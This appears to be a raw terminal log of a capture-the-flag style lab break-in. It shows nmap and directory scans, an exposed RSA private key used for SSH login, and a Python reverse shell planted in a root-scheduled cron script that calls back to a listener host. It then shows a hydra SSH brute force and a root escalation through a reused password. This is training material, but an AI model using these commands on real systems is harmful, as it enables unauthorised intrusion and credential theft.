
└─$ nmap -p 22,80,111,45746 -sV -A 172.16.85.132
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-07 03:39 EDT
Stats: 0:00:19 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 25.00% done; ETC: 03:40 (0:00:18 remaining)
Nmap scan report for 172.16.85.132
Host is up (0.00036s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|   1024 3d:6f:40:88:76:6a:1d:a1:fd:91:0f:dc:86:b7:81:13 (DSA)
|   2048 eb:29:c0:cb:eb:9a:0b:52:e7:9c:c4:a6:67:dc:33:e1 (RSA)
|   256 d4:02:99:b0:e7:7d:40:18:64:df:3b:28:5b:9e:f9:07 (ECDSA)
|_  256 e9:c4:0c:6d:4b:15:4a:58:4f:69:cd:df:13:76:32:4e (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title:  Secretsec Company 
| http-robots.txt: 2 disallowed entries 
|_/wordpress-blog /files
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          34432/udp6  status
|   100024  1          35822/udp   status
|   100024  1          38279/tcp6  status
|_  100024  1          45746/tcp   status
45746/tcp open  status  1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

└─$ rpcclient 172.16.85.132
Cannot connect to server.  Error was NT_STATUS_CONNECTION_REFUSED

└─$ sudo dirsearch -u  http://172.16.85.132
[sudo] password for kali: 
Sorry, try again.
[sudo] password for kali: 
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_172.16.85.132/_24-05-07_04-19-19.txt

Target: http://172.16.85.132/

[04:19:19] Starting: 
[04:19:20] 403 -  299B  - /.ht_wsr.txt
[04:19:20] 403 -  302B  - /.htaccess.bak1
[04:19:20] 403 -  302B  - /.htaccess.save
[04:19:20] 403 -  304B  - /.htaccess.sample
[04:19:20] 403 -  302B  - /.htaccess_orig
[04:19:20] 403 -  303B  - /.htaccess_extra
[04:19:20] 403 -  302B  - /.htaccess.orig
[04:19:20] 403 -  300B  - /.htaccessOLD
[04:19:20] 403 -  292B  - /.htm
[04:19:20] 403 -  300B  - /.htaccess_sc
[04:19:20] 403 -  301B  - /.htaccessOLD2
[04:19:20] 403 -  300B  - /.htaccessBAK
[04:19:20] 403 -  299B  - /.httr-oauth
[04:19:20] 403 -  293B  - /.html
[04:19:20] 403 -  302B  - /.htpasswd_test
[04:19:20] 403 -  298B  - /.htpasswds
[04:19:30] 301 -  314B  - /files  ->  http://172.16.85.132/files/
[04:19:30] 200 -  405B  - /files/
[04:19:31] 301 -  314B  - /icons  ->  http://172.16.85.132/icons/
[04:19:33] 301 -  315B  - /manual  ->  http://172.16.85.132/manual/
[04:19:33] 200 -  201B  - /manual/index.html
[04:19:38] 200 -   57B  - /robots.txt
[04:19:39] 403 -  301B  - /server-status
[04:19:39] 403 -  302B  - /server-status/


http://172.16.85.132/icons/VDSoyuAXiO.txt

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAoNgGGOyEpn/txphuS2pDA1i2nvRxn6s8DO58QcSsY+/Nm6wC
tprVUPb+fmkKvOf5ntACY7c/5fM4y83+UWPG0l90WrjdaTCPaGAHjEpZYKt0lEc0
FiQkXTvJS4faYHNah/mEvhldgTc59jeX4di0f660mJjF31SA9UgMLQReKd5GKtUx
5m+sQq6L+VyA2/6GD/T3qx35AT4argdk1NZ9ONmj1ZcIp0evVJvUul34zuJZ5mDv
DZuLRR6QpcMLJRGEFZ4qwkMZn7NavEmfX1Yka6mu9iwxkY6iT45YA1C4p7NEi5yI
/P6kDxMfCVELAUaU8fcPolkZ6xLdS6yyThZHHwIDAQABAoIBAAZ+clCTTA/E3n7E
LL/SvH3oGQd16xh9O2FyR4YIQMWQKwb7/OgOfEpWjpPf/dT+sK9eypnoDiZkmYhw
+rGii6Z2wCXhjN7wXPnj1qotXkpu4bgS3+F8+BLjlQ79ny2Busf+pQNf1syexDJS
sEkoDLGTBiubD3Ii4UoF7KfsozihdmQY5qud2c4iE0ioayo2m9XIDreJEB20Q5Ta
lV0G03unv/v7OK3g8dAQHrBR9MXuYiorcwxLAe+Gm1h4XanMKDYM5/jW4JO2ITAn
kPducC9chbM4NqB3ryNCD4YEgx8zWGDt0wjgyfnsF4fiYEI6tqAwWoB0tdqJFXAy
FlQJfYECgYEAz1bFCpGBCApF1k/oaQAyy5tir5NQpttCc0L2U1kiJWNmJSHk/tTX
4+ly0CBUzDkkedY1tVYK7TuH7/tOjh8M1BLa+g+Csb/OWLuMKmpoqyaejmoKkLnB
WVGkcdIulfsW7DWVMS/zA8ixJpt7bvY7Y142gkurxqjLMz5s/xT9geECgYEAxpfC
fGvogWRYUY07OLE/b7oMVOdBQsmlnaKVybuKf3RjeCYhbiRSzKz05NM/1Cqf359l
Wdznq4fkIvr6khliuj8GuCwv6wKn9+nViS18s1bG6Z5UJYSRJRpviCS+9BGShG1s
KOf1fAWNwRcn1UKtdQVvaLBX9kIwcmTBrl+e6P8CgYAtz24Zt6xaqmpjv6QKDxEq
C1rykAnx0+AKt3DVWYxB1oRrD+IYq85HfPzxHzOdK8LzaHDVb/1aDR0r2MqyfAnJ
kaDwPx0RSN++mzGM7ZXSuuWtcaCD+YbOxUsgGuBQIvodlnkwNPfsjhsV/KR5D85v
VhGVGEML0Z+T4ucSNQEOAQKBgQCHedfvUR3Xx0CIwbP4xNHlwiHPecMHcNBObS+J
4ypkMF37BOghXx4tCoA16fbNIhbWUsKtPwm79oQnaNeu+ypiq8RFt78orzMu6JIH
dsRvA2/Gx3/X6Eur6BDV61to3OP6+zqh3TuWU6OUadt+nHIANqj93e7jy9uI7jtC
XXDmuQKBgHZAE6GTq47k4sbFbWqldS79yhjjLloj0VUhValZyAP6XV8JTiAg9CYR
2o1pyGm7j7wfhIZNBP/wwJSC2/NLV6rQeH7Zj8nFv69RcRX56LrQZjFAWWsa/C43
rlJ7dOFH7OFQbGp51ub88M1VOiXR6/fU8OMOkXfi1KkETj/xp6t+
-----END RSA PRIVATE KEY-----

└─$ ssh martin@172.16.85.132 -i id_rsa
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.

#400 or 600 here is required
└─$ chmod 600 id_rsa                        
                                                                                                                                                          
┌──(kali㉿kali)-[~/Downloads]
└─$ ll
total 20
drwxr-xr-x 4 kali kali 4096 May  6 05:19 39772
-rw-r--r-- 1 kali kali 7025 May  6 05:17 39772.zip
-rw------- 1 kali kali 1677 May  7 05:12 id_rsa
drwxrwxr-x 3 kali kali 4096 Aug 15  2016 __MACOSX

└─$ ssh martin@172.16.85.132 -i id_rsa
sign_and_send_pubkey: no mutual signature supported

└─$ ssh -o PubkeyAcceptedKeyTypes=+ssh-rsa martin@172.16.85.132 -i id_rsa 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jun  9 20:31:29 2017 from 192.168.0.42

READY TO ACCESS THE SECRET LAB ? 

secret password : 
WELCOME ! 
martin@debian:~$ 

cat /etc/crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/5   * * * *   jimmy   python /tmp/sekurity.py

//under .tmp , no se file, so we create a reverse shell there. then listen on the host
martin@debian:/tmp$ cat sekurity.py 
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.105",8821));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'





*********************************************************************************
#crawl a psswd list,source from a web packages
└─$ cewl -m 5 -o http://172.16.85.132/ -w rawpass.txt  #-m mini length
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

# a rule to create the list, by the way of hashcat
$hashcat --stdout name.txt  -r /usr/share/hashcat/rules/combinator.rule -o newname.txt

# to brute force ssh port.

└─$ hydra -t 15 -L namelist.txt -P passwd.txt 172.16.85.132 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-09 02:31:19
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 15 tasks per 1 server, overall 15 tasks, 1008 login tries (l:1/p:1008), ~68 tries per task
[DATA] attacking ssh://172.16.85.132:22/
[STATUS] 90.00 tries/min, 90 tries in 00:01h, 918 to do in 00:11h, 15 active
 


[STATUS] 105.00 tries/min, 315 tries in 00:03h, 693 to do in 00:07h, 15 active

[STATUS] 87.86 tries/min, 615 tries in 00:07h, 393 to do in 00:05h, 15 active
[22][ssh] host: 172.16.85.132   login: hadi   password: hadi123

hadi@debian:/home/martin$ su 
Mot de passe : 
root@debian:/home/martin# id
uid=0(root) gid=0(root) groupes=0(root)
# the su passwd is the same as hadi
